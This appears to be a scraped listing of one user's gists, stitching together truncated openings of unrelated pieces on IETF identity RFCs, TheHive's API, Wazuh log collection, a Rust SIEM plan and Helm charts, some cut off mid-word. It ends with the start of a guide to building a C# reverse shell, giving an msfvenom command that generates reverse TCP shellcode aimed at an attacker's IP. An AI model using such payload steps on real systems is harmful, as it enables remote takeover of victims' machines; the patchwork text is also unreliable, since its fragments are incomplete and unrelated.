Anubhav Gain anubhavg-icpl

1. What “Identity” Means in the Context of IETF RFC Standards

In the IETF standards process, identity-related RFCs can refer to:

  1. Protocols or extensions that define identity formats, representations, or attributes
  2. Protocols that support authentication and identity assurance
  3. Protocols focused on identity management across systems/domains
  4. Identity-related encryption or identifier representation mechanisms

There is no official IETF category labeled “identity” that lists all RFCs by that topic, so any enumeration is necessarily approximate and depends on the inclusion criteria chosen.

Perfect! I found the profile API endpoints. The error you're seeing (/api/v1/profile returns NotFoundError) is because there's no direct GET endpoint for listing profiles in v1. However, I can see from the routing that profiles can be accessed. Let me explain how to list all profiles:

How to List All Profiles in TheHive

Based on the codebase analysis, here are the ways to list profiles:

Wazuh Agent: Collecting Kernel Logs from journald on Fedora

This document explains how to configure the Wazuh agent on a Fedora system to collect kernel logs from journald using journalctl, and how to verify and view them on the Wazuh Dashboard.
1. Configure the Wazuh Agent

osquery-wazuh.sh.x.c
osq
# GNU/Linux Resource List
##### Shells
✅ <a href="https://www.gnu.org/software/bash/"><b>GNU Bash</b></a> - is an sh-compatible shell that incorporates useful features from the Korn shell and C shell.<br>
✅ <a href="https://www.zsh.org/"><b>Zsh</b></a> - is a shell designed for interactive use, although it is also a powerful scripting language.<br>
✅ <a href="https://tcl-lang.org/"><b>tclsh</b></a> - is a very powerful cross-platform shell, suitable for a huge range of uses.<br>
✅ <a href="https://github.com/Bash-it/bash-it"><b>bash-it</b></a> - is a framework for using, developing and maintaining shell scripts and custom commands.<br>

Wazuh Agent Logging Capabilities: Comprehensive Technical Analysis

Wazuh agents provide enterprise-grade, multi-platform security monitoring with sophisticated log collection, parsing, and forwarding capabilities designed for XDR/OXDR platforms. This analysis reveals that Wazuh employs a modular architecture capable of processing 50,000+ events per second while maintaining minimal system overhead (35MB RAM average) and AES-256 encrypted communications. The platform's open-source nature, combined with extensive SIEM integration capabilities and MITRE ATT&CK framework alignment, positions it as a viable alternative to commercial endpoint detection solutions.

Agent architecture and core logging framework

Wazuh implements a distributed, modular agent architecture where specialized daemons handle distinct security monitoring functions. The core logging subsystem centers around the wazuh-logcollector daemon, which operates through multiple collection engines supporting diverse log formats and sour

Cross-Platform Rust-Based SIEM Platform Implementation Plan

A comprehensive security monitoring solution leveraging Rust's memory safety and performance for enterprise-grade threat detection across Windows, macOS, and Linux environments.

🎯 Executive Summary

This plan outlines the development and deployment of a next-generation Security Information and Event Management (SIEM) platform built on Rust-based technologies. The solution provides unified threat detection, incident response, and forensic analysis capabilities across heterogeneous environments while maintaining security-by-design principles.

Key Differentiators:

  • Memory Safety: 68% reduction in security vulnerabilities compared to C/C++ implementations

Agent Status Management Components

1. Primary Daemon: wazuh-remoted

The wazuh-remoted daemon is the core server-side component that manages agent communication and status. It handles the agent keepalive mechanism and updates agent status using the wdb_update_agent_keepalive(agent_id, AGENT_CS_ACTIVE, ...) function.

Location: The remoted daemon runs by default as the wazuh user and is chrooted to /var/ossec.

2. Agent Status Storage - Database Layer

Complete Guide: Setting Up and Publishing Helm Charts to ChartMuseum

1. Setting Up ChartMuseum

Install ChartMuseum in Kubernetes

# Add ChartMuseum's Helm repo
helm repo add chartmuseum https://chartmuseum.github.io/charts

# Install ChartMuseum with API enabled for uploads

🛠️ Step-by-Step Guide to Creating a C# Reverse Shell

1. Generate Shellcode with msfvenom

Use msfvenom to create shellcode for a reverse TCP shell. Replace YOUR_IP with your attacker's IP address and YOUR_PORT with the desired port number:

msfvenom -p windows/x64/shell_reverse_tcp LHOST=YOUR_IP LPORT=YOUR_PORT -f csharp